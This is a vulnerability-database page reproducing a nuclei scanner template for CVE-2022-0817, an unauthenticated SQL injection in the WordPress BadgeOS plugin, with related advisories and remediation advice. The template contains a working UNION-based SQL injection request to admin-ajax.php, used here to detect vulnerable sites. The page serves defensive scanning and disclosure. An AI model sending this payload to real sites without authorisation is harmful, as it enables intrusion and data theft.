Lucene search
K

WordPress BadgeOS <=3.7.0 - SQL Injection

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WordPress BadgeOS <=3.7.0 - SQL Injection. Unsanitized parameter in AJAX action may lead to data leakage

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0817
9 May 202217:15
attackerkb
Circl
CVE-2022-0817
9 May 202220:36
circl
CNNVD
WordPress plugin BadgeOS SQL注入漏洞
9 May 202200:00
cnnvd
CVE
CVE-2022-0817
9 May 202216:50
cve
Cvelist
CVE-2022-0817 BadgeOS <= 3.7.0 - Unauthenticated SQLi
9 May 202216:50
cvelist
NVD
CVE-2022-0817
9 May 202217:15
nvd
OSV
CVE-2022-0817
9 May 202217:15
osv
Patchstack
WordPress BadgeOS plugin <= 3.7.0 - Unauthenticated SQL Injection (SQLi) vulnerability
13 Apr 202200:00
patchstack
Prion
Sql injection
9 May 202217:15
prion
RedhatCVE
CVE-2022-0817
9 Jan 202610:44
redhatcve
Rows per page
id: CVE-2022-0817

info:
  name: WordPress BadgeOS <=3.7.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress BadgeOS plugin through 3.7.0  contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
    - https://wordpress.org/plugins/badgeos/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0817
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0817
    cwe-id: CWE-89
    epss-score: 0.11485
    epss-percentile: 0.95478
    cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: badgeos
    product: badgeos
    framework: wordpress
  tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - "contains(body, md5(num))"
          - 'contains(content_type, "application/json")'
          - 'contains(body, "badgeos-arrange-buttons")'
        condition: and
# digest: 4a0a004730450220304fd81529555166b19bbee6e1b4e15832da531b23482533849560e4337d65cf022100fe00aaab18d235355affcd13f9d5a959b04238a0fe9d2db6db436b15416af98c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.11485
26